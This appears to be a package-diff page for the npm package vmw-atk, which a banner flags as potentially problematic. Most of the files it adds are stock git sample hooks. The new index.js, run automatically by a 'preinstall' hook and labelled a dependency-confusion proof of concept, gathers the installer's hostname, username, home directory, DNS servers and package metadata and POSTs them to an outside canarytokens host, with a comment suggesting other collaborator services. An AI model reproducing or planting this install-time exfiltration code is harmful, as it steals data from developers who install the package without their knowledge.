vmw-atk 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of vmw-atk might be problematic. Click here for more details.
- package/applypatch-msg.sample +15 -0
- package/commit-msg.sample +24 -0
- package/fsmonitor-watchman.sample +174 -0
- package/index.js +46 -0
- package/package.json +9 -3
- package/post-update.sample +8 -0
- package/pre-applypatch.sample +14 -0
- package/pre-commit.sample +49 -0
- package/pre-merge-commit.sample +13 -0
- package/pre-push.sample +53 -0
- package/pre-rebase.sample +169 -0
- package/pre-receive.sample +24 -0
- package/prepare-commit-msg.sample +42 -0
- package/push-to-checkout.sample +78 -0
- package/update.sample +128 -0
- package/README.md +0 -5
@@ -0,0 +1,15 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to check the commit log message taken by
|
4
|
+
# applypatch from an e-mail message.
|
5
|
+
#
|
6
|
+
# The hook should exit with non-zero status after issuing an
|
7
|
+
# appropriate message if it wants to stop the commit. The hook is
|
8
|
+
# allowed to edit the commit message file.
|
9
|
+
#
|
10
|
+
# To enable this hook, rename this file to "applypatch-msg".
|
11
|
+
|
12
|
+
. git-sh-setup
|
13
|
+
commitmsg="$(git rev-parse --git-path hooks/commit-msg)"
|
14
|
+
test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"}
|
15
|
+
:
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to check the commit log message.
|
4
|
+
# Called by "git commit" with one argument, the name of the file
|
5
|
+
# that has the commit message. The hook should exit with non-zero
|
6
|
+
# status after issuing an appropriate message if it wants to stop the
|
7
|
+
# commit. The hook is allowed to edit the commit message file.
|
8
|
+
#
|
9
|
+
# To enable this hook, rename this file to "commit-msg".
|
10
|
+
|
11
|
+
# Uncomment the below to add a Signed-off-by line to the message.
|
12
|
+
# Doing this in a hook is a bad idea in general, but the prepare-commit-msg
|
13
|
+
# hook is more suited to it.
|
14
|
+
#
|
15
|
+
# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
|
16
|
+
# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
|
17
|
+
|
18
|
+
# This example catches duplicate Signed-off-by lines.
|
19
|
+
|
20
|
+
test "" = "$(grep '^Signed-off-by: ' "$1" |
|
21
|
+
sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || {
|
22
|
+
echo >&2 Duplicate Signed-off-by lines.
|
23
|
+
exit 1
|
24
|
+
}
|
@@ -0,0 +1,174 @@
|
|
1
|
+
#!/usr/bin/perl
|
2
|
+
|
3
|
+
use strict;
|
4
|
+
use warnings;
|
5
|
+
use IPC::Open2;
|
6
|
+
|
7
|
+
# An example hook script to integrate Watchman
|
8
|
+
# (https://facebook.github.io/watchman/) with git to speed up detecting
|
9
|
+
# new and modified files.
|
10
|
+
#
|
11
|
+
# The hook is passed a version (currently 2) and last update token
|
12
|
+
# formatted as a string and outputs to stdout a new update token and
|
13
|
+
# all files that have been modified since the update token. Paths must
|
14
|
+
# be relative to the root of the working tree and separated by a single NUL.
|
15
|
+
#
|
16
|
+
# To enable this hook, rename this file to "query-watchman" and set
|
17
|
+
# 'git config core.fsmonitor .git/hooks/query-watchman'
|
18
|
+
#
|
19
|
+
my ($version, $last_update_token) = @ARGV;
|
20
|
+
|
21
|
+
# Uncomment for debugging
|
22
|
+
# print STDERR "$0 $version $last_update_token\n";
|
23
|
+
|
24
|
+
# Check the hook interface version
|
25
|
+
if ($version ne 2) {
|
26
|
+
die "Unsupported query-fsmonitor hook version '$version'.\n" .
|
27
|
+
"Falling back to scanning...\n";
|
28
|
+
}
|
29
|
+
|
30
|
+
my $git_work_tree = get_working_dir();
|
31
|
+
|
32
|
+
my $retry = 1;
|
33
|
+
|
34
|
+
my $json_pkg;
|
35
|
+
eval {
|
36
|
+
require JSON::XS;
|
37
|
+
$json_pkg = "JSON::XS";
|
38
|
+
1;
|
39
|
+
} or do {
|
40
|
+
require JSON::PP;
|
41
|
+
$json_pkg = "JSON::PP";
|
42
|
+
};
|
43
|
+
|
44
|
+
launch_watchman();
|
45
|
+
|
46
|
+
sub launch_watchman {
|
47
|
+
my $o = watchman_query();
|
48
|
+
if (is_work_tree_watched($o)) {
|
49
|
+
output_result($o->{clock}, @{$o->{files}});
|
50
|
+
}
|
51
|
+
}
|
52
|
+
|
53
|
+
sub output_result {
|
54
|
+
my ($clockid, @files) = @_;
|
55
|
+
|
56
|
+
# Uncomment for debugging watchman output
|
57
|
+
# open (my $fh, ">", ".git/watchman-output.out");
|
58
|
+
# binmode $fh, ":utf8";
|
59
|
+
# print $fh "$clockid\n@files\n";
|
60
|
+
# close $fh;
|
61
|
+
|
62
|
+
binmode STDOUT, ":utf8";
|
63
|
+
print $clockid;
|
64
|
+
print "\0";
|
65
|
+
local $, = "\0";
|
66
|
+
print @files;
|
67
|
+
}
|
68
|
+
|
69
|
+
sub watchman_clock {
|
70
|
+
my $response = qx/watchman clock "$git_work_tree"/;
|
71
|
+
die "Failed to get clock id on '$git_work_tree'.\n" .
|
72
|
+
"Falling back to scanning...\n" if $? != 0;
|
73
|
+
|
74
|
+
return $json_pkg->new->utf8->decode($response);
|
75
|
+
}
|
76
|
+
|
77
|
+
sub watchman_query {
|
78
|
+
my $pid = open2(\*CHLD_OUT, \*CHLD_IN, 'watchman -j --no-pretty')
|
79
|
+
or die "open2() failed: $!\n" .
|
80
|
+
"Falling back to scanning...\n";
|
81
|
+
|
82
|
+
# In the query expression below we're asking for names of files that
|
83
|
+
# changed since $last_update_token but not from the .git folder.
|
84
|
+
#
|
85
|
+
# To accomplish this, we're using the "since" generator to use the
|
86
|
+
# recency index to select candidate nodes and "fields" to limit the
|
87
|
+
# output to file names only. Then we're using the "expression" term to
|
88
|
+
# further constrain the results.
|
89
|
+
my $last_update_line = "";
|
90
|
+
if (substr($last_update_token, 0, 1) eq "c") {
|
91
|
+
$last_update_token = "\"$last_update_token\"";
|
92
|
+
$last_update_line = qq[\n"since": $last_update_token,];
|
93
|
+
}
|
94
|
+
my $query = <<" END";
|
95
|
+
["query", "$git_work_tree", {$last_update_line
|
96
|
+
"fields": ["name"],
|
97
|
+
"expression": ["not", ["dirname", ".git"]]
|
98
|
+
}]
|
99
|
+
END
|
100
|
+
|
101
|
+
# Uncomment for debugging the watchman query
|
102
|
+
# open (my $fh, ">", ".git/watchman-query.json");
|
103
|
+
# print $fh $query;
|
104
|
+
# close $fh;
|
105
|
+
|
106
|
+
print CHLD_IN $query;
|
107
|
+
close CHLD_IN;
|
108
|
+
my $response = do {local $/; <CHLD_OUT>};
|
109
|
+
|
110
|
+
# Uncomment for debugging the watch response
|
111
|
+
# open ($fh, ">", ".git/watchman-response.json");
|
112
|
+
# print $fh $response;
|
113
|
+
# close $fh;
|
114
|
+
|
115
|
+
die "Watchman: command returned no output.\n" .
|
116
|
+
"Falling back to scanning...\n" if $response eq "";
|
117
|
+
die "Watchman: command returned invalid output: $response\n" .
|
118
|
+
"Falling back to scanning...\n" unless $response =~ /^\{/;
|
119
|
+
|
120
|
+
return $json_pkg->new->utf8->decode($response);
|
121
|
+
}
|
122
|
+
|
123
|
+
sub is_work_tree_watched {
|
124
|
+
my ($output) = @_;
|
125
|
+
my $error = $output->{error};
|
126
|
+
if ($retry > 0 and $error and $error =~ m/unable to resolve root .* directory (.*) is not watched/) {
|
127
|
+
$retry--;
|
128
|
+
my $response = qx/watchman watch "$git_work_tree"/;
|
129
|
+
die "Failed to make watchman watch '$git_work_tree'.\n" .
|
130
|
+
"Falling back to scanning...\n" if $? != 0;
|
131
|
+
$output = $json_pkg->new->utf8->decode($response);
|
132
|
+
$error = $output->{error};
|
133
|
+
die "Watchman: $error.\n" .
|
134
|
+
"Falling back to scanning...\n" if $error;
|
135
|
+
|
136
|
+
# Uncomment for debugging watchman output
|
137
|
+
# open (my $fh, ">", ".git/watchman-output.out");
|
138
|
+
# close $fh;
|
139
|
+
|
140
|
+
# Watchman will always return all files on the first query so
|
141
|
+
# return the fast "everything is dirty" flag to git and do the
|
142
|
+
# Watchman query just to get it over with now so we won't pay
|
143
|
+
# the cost in git to look up each individual file.
|
144
|
+
my $o = watchman_clock();
|
145
|
+
$error = $output->{error};
|
146
|
+
|
147
|
+
die "Watchman: $error.\n" .
|
148
|
+
"Falling back to scanning...\n" if $error;
|
149
|
+
|
150
|
+
output_result($o->{clock}, ("/"));
|
151
|
+
$last_update_token = $o->{clock};
|
152
|
+
|
153
|
+
eval { launch_watchman() };
|
154
|
+
return 0;
|
155
|
+
}
|
156
|
+
|
157
|
+
die "Watchman: $error.\n" .
|
158
|
+
"Falling back to scanning...\n" if $error;
|
159
|
+
|
160
|
+
return 1;
|
161
|
+
}
|
162
|
+
|
163
|
+
sub get_working_dir {
|
164
|
+
my $working_dir;
|
165
|
+
if ($^O =~ 'msys' || $^O =~ 'cygwin') {
|
166
|
+
$working_dir = Win32::GetCwd();
|
167
|
+
$working_dir =~ tr/\\/\//;
|
168
|
+
} else {
|
169
|
+
require Cwd;
|
170
|
+
$working_dir = Cwd::cwd();
|
171
|
+
}
|
172
|
+
|
173
|
+
return $working_dir;
|
174
|
+
}
|
package/index.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ks8a2g1tbqmizmat501pc33dv.canarytokens.com", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "vmw-atk",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "AT&T Confusion POC",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
@@ -0,0 +1,14 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to verify what is about to be committed
|
4
|
+
# by applypatch from an e-mail message.
|
5
|
+
#
|
6
|
+
# The hook should exit with non-zero status after issuing an
|
7
|
+
# appropriate message if it wants to stop the commit.
|
8
|
+
#
|
9
|
+
# To enable this hook, rename this file to "pre-applypatch".
|
10
|
+
|
11
|
+
. git-sh-setup
|
12
|
+
precommit="$(git rev-parse --git-path hooks/pre-commit)"
|
13
|
+
test -x "$precommit" && exec "$precommit" ${1+"$@"}
|
14
|
+
:
|
@@ -0,0 +1,49 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to verify what is about to be committed.
|
4
|
+
# Called by "git commit" with no arguments. The hook should
|
5
|
+
# exit with non-zero status after issuing an appropriate message if
|
6
|
+
# it wants to stop the commit.
|
7
|
+
#
|
8
|
+
# To enable this hook, rename this file to "pre-commit".
|
9
|
+
|
10
|
+
if git rev-parse --verify HEAD >/dev/null 2>&1
|
11
|
+
then
|
12
|
+
against=HEAD
|
13
|
+
else
|
14
|
+
# Initial commit: diff against an empty tree object
|
15
|
+
against=$(git hash-object -t tree /dev/null)
|
16
|
+
fi
|
17
|
+
|
18
|
+
# If you want to allow non-ASCII filenames set this variable to true.
|
19
|
+
allownonascii=$(git config --type=bool hooks.allownonascii)
|
20
|
+
|
21
|
+
# Redirect output to stderr.
|
22
|
+
exec 1>&2
|
23
|
+
|
24
|
+
# Cross platform projects tend to avoid non-ASCII filenames; prevent
|
25
|
+
# them from being added to the repository. We exploit the fact that the
|
26
|
+
# printable range starts at the space character and ends with tilde.
|
27
|
+
if [ "$allownonascii" != "true" ] &&
|
28
|
+
# Note that the use of brackets around a tr range is ok here, (it's
|
29
|
+
# even required, for portability to Solaris 10's /usr/bin/tr), since
|
30
|
+
# the square bracket bytes happen to fall in the designated range.
|
31
|
+
test $(git diff --cached --name-only --diff-filter=A -z $against |
|
32
|
+
LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0
|
33
|
+
then
|
34
|
+
cat <<\EOF
|
35
|
+
Error: Attempt to add a non-ASCII file name.
|
36
|
+
|
37
|
+
This can cause problems if you want to work with people on other platforms.
|
38
|
+
|
39
|
+
To be portable it is advisable to rename the file.
|
40
|
+
|
41
|
+
If you know what you are doing you can disable this check using:
|
42
|
+
|
43
|
+
git config hooks.allownonascii true
|
44
|
+
EOF
|
45
|
+
exit 1
|
46
|
+
fi
|
47
|
+
|
48
|
+
# If there are whitespace errors, print the offending file names and fail.
|
49
|
+
exec git diff-index --check --cached $against --
|
@@ -0,0 +1,13 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to verify what is about to be committed.
|
4
|
+
# Called by "git merge" with no arguments. The hook should
|
5
|
+
# exit with non-zero status after issuing an appropriate message to
|
6
|
+
# stderr if it wants to stop the merge commit.
|
7
|
+
#
|
8
|
+
# To enable this hook, rename this file to "pre-merge-commit".
|
9
|
+
|
10
|
+
. git-sh-setup
|
11
|
+
test -x "$GIT_DIR/hooks/pre-commit" &&
|
12
|
+
exec "$GIT_DIR/hooks/pre-commit"
|
13
|
+
:
|
package/pre-push.sample
ADDED
@@ -0,0 +1,53 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
|
3
|
+
# An example hook script to verify what is about to be pushed. Called by "git
|
4
|
+
# push" after it has checked the remote status, but before anything has been
|
5
|
+
# pushed. If this script exits with a non-zero status nothing will be pushed.
|
6
|
+
#
|
7
|
+
# This hook is called with the following parameters:
|
8
|
+
#
|
9
|
+
# $1 -- Name of the remote to which the push is being done
|
10
|
+
# $2 -- URL to which the push is being done
|
11
|
+
#
|
12
|
+
# If pushing without using a named remote those arguments will be equal.
|
13
|
+
#
|
14
|
+
# Information about the commits which are being pushed is supplied as lines to
|
15
|
+
# the standard input in the form:
|
16
|
+
#
|
17
|
+
# <local ref> <local oid> <remote ref> <remote oid>
|
18
|
+
#
|
19
|
+
# This sample shows how to prevent push of commits where the log message starts
|
20
|
+
# with "WIP" (work in progress).
|
21
|
+
|
22
|
+
remote="$1"
|
23
|
+
url="$2"
|
24
|
+
|
25
|
+
zero=$(git hash-object --stdin </dev/null | tr '[0-9a-f]' '0')
|
26
|
+
|
27
|
+
while read local_ref local_oid remote_ref remote_oid
|
28
|
+
do
|
29
|
+
if test "$local_oid" = "$zero"
|
30
|
+
then
|
31
|
+
# Handle delete
|
32
|
+
:
|
33
|
+
else
|
34
|
+
if test "$remote_oid" = "$zero"
|
35
|
+
then
|
36
|
+
# New branch, examine all commits
|
37
|
+
range="$local_oid"
|
38
|
+
else
|
39
|
+
# Update to existing branch, examine new commits
|
40
|
+
range="$remote_oid..$local_oid"
|
41
|
+
fi
|
42
|
+
|
43
|
+
# Check for WIP commit
|
44
|
+
commit=$(git rev-list -n 1 --grep '^WIP' "$range")
|
45
|
+
if test -n "$commit"
|
46
|
+
then
|
47
|
+
echo >&2 "Found WIP commit in $local_ref, not pushing"
|
48
|
+
exit 1
|
49
|
+
fi
|
50
|
+
fi
|
51
|
+
done
|
52
|
+
|
53
|
+
exit 0
|
@@ -0,0 +1,169 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# Copyright (c) 2006, 2008 Junio C Hamano
|
4
|
+
#
|
5
|
+
# The "pre-rebase" hook is run just before "git rebase" starts doing
|
6
|
+
# its job, and can prevent the command from running by exiting with
|
7
|
+
# non-zero status.
|
8
|
+
#
|
9
|
+
# The hook is called with the following parameters:
|
10
|
+
#
|
11
|
+
# $1 -- the upstream the series was forked from.
|
12
|
+
# $2 -- the branch being rebased (or empty when rebasing the current branch).
|
13
|
+
#
|
14
|
+
# This sample shows how to prevent topic branches that are already
|
15
|
+
# merged to 'next' branch from getting rebased, because allowing it
|
16
|
+
# would result in rebasing already published history.
|
17
|
+
|
18
|
+
publish=next
|
19
|
+
basebranch="$1"
|
20
|
+
if test "$#" = 2
|
21
|
+
then
|
22
|
+
topic="refs/heads/$2"
|
23
|
+
else
|
24
|
+
topic=`git symbolic-ref HEAD` ||
|
25
|
+
exit 0 ;# we do not interrupt rebasing detached HEAD
|
26
|
+
fi
|
27
|
+
|
28
|
+
case "$topic" in
|
29
|
+
refs/heads/??/*)
|
30
|
+
;;
|
31
|
+
*)
|
32
|
+
exit 0 ;# we do not interrupt others.
|
33
|
+
;;
|
34
|
+
esac
|
35
|
+
|
36
|
+
# Now we are dealing with a topic branch being rebased
|
37
|
+
# on top of master. Is it OK to rebase it?
|
38
|
+
|
39
|
+
# Does the topic really exist?
|
40
|
+
git show-ref -q "$topic" || {
|
41
|
+
echo >&2 "No such branch $topic"
|
42
|
+
exit 1
|
43
|
+
}
|
44
|
+
|
45
|
+
# Is topic fully merged to master?
|
46
|
+
not_in_master=`git rev-list --pretty=oneline ^master "$topic"`
|
47
|
+
if test -z "$not_in_master"
|
48
|
+
then
|
49
|
+
echo >&2 "$topic is fully merged to master; better remove it."
|
50
|
+
exit 1 ;# we could allow it, but there is no point.
|
51
|
+
fi
|
52
|
+
|
53
|
+
# Is topic ever merged to next? If so you should not be rebasing it.
|
54
|
+
only_next_1=`git rev-list ^master "^$topic" ${publish} | sort`
|
55
|
+
only_next_2=`git rev-list ^master ${publish} | sort`
|
56
|
+
if test "$only_next_1" = "$only_next_2"
|
57
|
+
then
|
58
|
+
not_in_topic=`git rev-list "^$topic" master`
|
59
|
+
if test -z "$not_in_topic"
|
60
|
+
then
|
61
|
+
echo >&2 "$topic is already up to date with master"
|
62
|
+
exit 1 ;# we could allow it, but there is no point.
|
63
|
+
else
|
64
|
+
exit 0
|
65
|
+
fi
|
66
|
+
else
|
67
|
+
not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"`
|
68
|
+
/usr/bin/perl -e '
|
69
|
+
my $topic = $ARGV[0];
|
70
|
+
my $msg = "* $topic has commits already merged to public branch:\n";
|
71
|
+
my (%not_in_next) = map {
|
72
|
+
/^([0-9a-f]+) /;
|
73
|
+
($1 => 1);
|
74
|
+
} split(/\n/, $ARGV[1]);
|
75
|
+
for my $elem (map {
|
76
|
+
/^([0-9a-f]+) (.*)$/;
|
77
|
+
[$1 => $2];
|
78
|
+
} split(/\n/, $ARGV[2])) {
|
79
|
+
if (!exists $not_in_next{$elem->[0]}) {
|
80
|
+
if ($msg) {
|
81
|
+
print STDERR $msg;
|
82
|
+
undef $msg;
|
83
|
+
}
|
84
|
+
print STDERR " $elem->[1]\n";
|
85
|
+
}
|
86
|
+
}
|
87
|
+
' "$topic" "$not_in_next" "$not_in_master"
|
88
|
+
exit 1
|
89
|
+
fi
|
90
|
+
|
91
|
+
<<\DOC_END
|
92
|
+
|
93
|
+
This sample hook safeguards topic branches that have been
|
94
|
+
published from being rewound.
|
95
|
+
|
96
|
+
The workflow assumed here is:
|
97
|
+
|
98
|
+
* Once a topic branch forks from "master", "master" is never
|
99
|
+
merged into it again (either directly or indirectly).
|
100
|
+
|
101
|
+
* Once a topic branch is fully cooked and merged into "master",
|
102
|
+
it is deleted. If you need to build on top of it to correct
|
103
|
+
earlier mistakes, a new topic branch is created by forking at
|
104
|
+
the tip of the "master". This is not strictly necessary, but
|
105
|
+
it makes it easier to keep your history simple.
|
106
|
+
|
107
|
+
* Whenever you need to test or publish your changes to topic
|
108
|
+
branches, merge them into "next" branch.
|
109
|
+
|
110
|
+
The script, being an example, hardcodes the publish branch name
|
111
|
+
to be "next", but it is trivial to make it configurable via
|
112
|
+
$GIT_DIR/config mechanism.
|
113
|
+
|
114
|
+
With this workflow, you would want to know:
|
115
|
+
|
116
|
+
(1) ... if a topic branch has ever been merged to "next". Young
|
117
|
+
topic branches can have stupid mistakes you would rather
|
118
|
+
clean up before publishing, and things that have not been
|
119
|
+
merged into other branches can be easily rebased without
|
120
|
+
affecting other people. But once it is published, you would
|
121
|
+
not want to rewind it.
|
122
|
+
|
123
|
+
(2) ... if a topic branch has been fully merged to "master".
|
124
|
+
Then you can delete it. More importantly, you should not
|
125
|
+
build on top of it -- other people may already want to
|
126
|
+
change things related to the topic as patches against your
|
127
|
+
"master", so if you need further changes, it is better to
|
128
|
+
fork the topic (perhaps with the same name) afresh from the
|
129
|
+
tip of "master".
|
130
|
+
|
131
|
+
Let's look at this example:
|
132
|
+
|
133
|
+
o---o---o---o---o---o---o---o---o---o "next"
|
134
|
+
/ / / /
|
135
|
+
/ a---a---b A / /
|
136
|
+
/ / / /
|
137
|
+
/ / c---c---c---c B /
|
138
|
+
/ / / \ /
|
139
|
+
/ / / b---b C \ /
|
140
|
+
/ / / / \ /
|
141
|
+
---o---o---o---o---o---o---o---o---o---o---o "master"
|
142
|
+
|
143
|
+
|
144
|
+
A, B and C are topic branches.
|
145
|
+
|
146
|
+
* A has one fix since it was merged up to "next".
|
147
|
+
|
148
|
+
* B has finished. It has been fully merged up to "master" and "next",
|
149
|
+
and is ready to be deleted.
|
150
|
+
|
151
|
+
* C has not merged to "next" at all.
|
152
|
+
|
153
|
+
We would want to allow C to be rebased, refuse A, and encourage
|
154
|
+
B to be deleted.
|
155
|
+
|
156
|
+
To compute (1):
|
157
|
+
|
158
|
+
git rev-list ^master ^topic next
|
159
|
+
git rev-list ^master next
|
160
|
+
|
161
|
+
if these match, topic has not merged in next at all.
|
162
|
+
|
163
|
+
To compute (2):
|
164
|
+
|
165
|
+
git rev-list master..topic
|
166
|
+
|
167
|
+
if this is empty, it is fully merged to "master".
|
168
|
+
|
169
|
+
DOC_END
|
@@ -0,0 +1,24 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to make use of push options.
|
4
|
+
# The example simply echoes all push options that start with 'echoback='
|
5
|
+
# and rejects all pushes when the "reject" push option is used.
|
6
|
+
#
|
7
|
+
# To enable this hook, rename this file to "pre-receive".
|
8
|
+
|
9
|
+
if test -n "$GIT_PUSH_OPTION_COUNT"
|
10
|
+
then
|
11
|
+
i=0
|
12
|
+
while test "$i" -lt "$GIT_PUSH_OPTION_COUNT"
|
13
|
+
do
|
14
|
+
eval "value=\$GIT_PUSH_OPTION_$i"
|
15
|
+
case "$value" in
|
16
|
+
echoback=*)
|
17
|
+
echo "echo from the pre-receive-hook: ${value#*=}" >&2
|
18
|
+
;;
|
19
|
+
reject)
|
20
|
+
exit 1
|
21
|
+
esac
|
22
|
+
i=$((i + 1))
|
23
|
+
done
|
24
|
+
fi
|
@@ -0,0 +1,42 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to prepare the commit log message.
|
4
|
+
# Called by "git commit" with the name of the file that has the
|
5
|
+
# commit message, followed by the description of the commit
|
6
|
+
# message's source. The hook's purpose is to edit the commit
|
7
|
+
# message file. If the hook fails with a non-zero status,
|
8
|
+
# the commit is aborted.
|
9
|
+
#
|
10
|
+
# To enable this hook, rename this file to "prepare-commit-msg".
|
11
|
+
|
12
|
+
# This hook includes three examples. The first one removes the
|
13
|
+
# "# Please enter the commit message..." help message.
|
14
|
+
#
|
15
|
+
# The second includes the output of "git diff --name-status -r"
|
16
|
+
# into the message, just before the "git status" output. It is
|
17
|
+
# commented because it doesn't cope with --amend or with squashed
|
18
|
+
# commits.
|
19
|
+
#
|
20
|
+
# The third example adds a Signed-off-by line to the message, that can
|
21
|
+
# still be edited. This is rarely a good idea.
|
22
|
+
|
23
|
+
COMMIT_MSG_FILE=$1
|
24
|
+
COMMIT_SOURCE=$2
|
25
|
+
SHA1=$3
|
26
|
+
|
27
|
+
/usr/bin/perl -i.bak -ne 'print unless(m/^. Please enter the commit message/..m/^#$/)' "$COMMIT_MSG_FILE"
|
28
|
+
|
29
|
+
# case "$COMMIT_SOURCE,$SHA1" in
|
30
|
+
# ,|template,)
|
31
|
+
# /usr/bin/perl -i.bak -pe '
|
32
|
+
# print "\n" . `git diff --cached --name-status -r`
|
33
|
+
# if /^#/ && $first++ == 0' "$COMMIT_MSG_FILE" ;;
|
34
|
+
# *) ;;
|
35
|
+
# esac
|
36
|
+
|
37
|
+
# SOB=$(git var GIT_COMMITTER_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
|
38
|
+
# git interpret-trailers --in-place --trailer "$SOB" "$COMMIT_MSG_FILE"
|
39
|
+
# if test -z "$COMMIT_SOURCE"
|
40
|
+
# then
|
41
|
+
# /usr/bin/perl -i.bak -pe 'print "\n" if !$first_line++' "$COMMIT_MSG_FILE"
|
42
|
+
# fi
|
@@ -0,0 +1,78 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
|
3
|
+
# An example hook script to update a checked-out tree on a git push.
|
4
|
+
#
|
5
|
+
# This hook is invoked by git-receive-pack(1) when it reacts to git
|
6
|
+
# push and updates reference(s) in its repository, and when the push
|
7
|
+
# tries to update the branch that is currently checked out and the
|
8
|
+
# receive.denyCurrentBranch configuration variable is set to
|
9
|
+
# updateInstead.
|
10
|
+
#
|
11
|
+
# By default, such a push is refused if the working tree and the index
|
12
|
+
# of the remote repository has any difference from the currently
|
13
|
+
# checked out commit; when both the working tree and the index match
|
14
|
+
# the current commit, they are updated to match the newly pushed tip
|
15
|
+
# of the branch. This hook is to be used to override the default
|
16
|
+
# behaviour; however the code below reimplements the default behaviour
|
17
|
+
# as a starting point for convenient modification.
|
18
|
+
#
|
19
|
+
# The hook receives the commit with which the tip of the current
|
20
|
+
# branch is going to be updated:
|
21
|
+
commit=$1
|
22
|
+
|
23
|
+
# It can exit with a non-zero status to refuse the push (when it does
|
24
|
+
# so, it must not modify the index or the working tree).
|
25
|
+
die () {
|
26
|
+
echo >&2 "$*"
|
27
|
+
exit 1
|
28
|
+
}
|
29
|
+
|
30
|
+
# Or it can make any necessary changes to the working tree and to the
|
31
|
+
# index to bring them to the desired state when the tip of the current
|
32
|
+
# branch is updated to the new commit, and exit with a zero status.
|
33
|
+
#
|
34
|
+
# For example, the hook can simply run git read-tree -u -m HEAD "$1"
|
35
|
+
# in order to emulate git fetch that is run in the reverse direction
|
36
|
+
# with git push, as the two-tree form of git read-tree -u -m is
|
37
|
+
# essentially the same as git switch or git checkout that switches
|
38
|
+
# branches while keeping the local changes in the working tree that do
|
39
|
+
# not interfere with the difference between the branches.
|
40
|
+
|
41
|
+
# The below is a more-or-less exact translation to shell of the C code
|
42
|
+
# for the default behaviour for git's push-to-checkout hook defined in
|
43
|
+
# the push_to_deploy() function in builtin/receive-pack.c.
|
44
|
+
#
|
45
|
+
# Note that the hook will be executed from the repository directory,
|
46
|
+
# not from the working tree, so if you want to perform operations on
|
47
|
+
# the working tree, you will have to adapt your code accordingly, e.g.
|
48
|
+
# by adding "cd .." or using relative paths.
|
49
|
+
|
50
|
+
if ! git update-index -q --ignore-submodules --refresh
|
51
|
+
then
|
52
|
+
die "Up-to-date check failed"
|
53
|
+
fi
|
54
|
+
|
55
|
+
if ! git diff-files --quiet --ignore-submodules --
|
56
|
+
then
|
57
|
+
die "Working directory has unstaged changes"
|
58
|
+
fi
|
59
|
+
|
60
|
+
# This is a rough translation of:
|
61
|
+
#
|
62
|
+
# head_has_history() ? "HEAD" : EMPTY_TREE_SHA1_HEX
|
63
|
+
if git cat-file -e HEAD 2>/dev/null
|
64
|
+
then
|
65
|
+
head=HEAD
|
66
|
+
else
|
67
|
+
head=$(git hash-object -t tree --stdin </dev/null)
|
68
|
+
fi
|
69
|
+
|
70
|
+
if ! git diff-index --quiet --cached --ignore-submodules $head --
|
71
|
+
then
|
72
|
+
die "Working directory has staged changes"
|
73
|
+
fi
|
74
|
+
|
75
|
+
if ! git read-tree -u -m "$commit"
|
76
|
+
then
|
77
|
+
die "Could not update working tree to new HEAD"
|
78
|
+
fi
|
package/update.sample
ADDED
@@ -0,0 +1,128 @@
|
|
1
|
+
#!/bin/sh
|
2
|
+
#
|
3
|
+
# An example hook script to block unannotated tags from entering.
|
4
|
+
# Called by "git receive-pack" with arguments: refname sha1-old sha1-new
|
5
|
+
#
|
6
|
+
# To enable this hook, rename this file to "update".
|
7
|
+
#
|
8
|
+
# Config
|
9
|
+
# ------
|
10
|
+
# hooks.allowunannotated
|
11
|
+
# This boolean sets whether unannotated tags will be allowed into the
|
12
|
+
# repository. By default they won't be.
|
13
|
+
# hooks.allowdeletetag
|
14
|
+
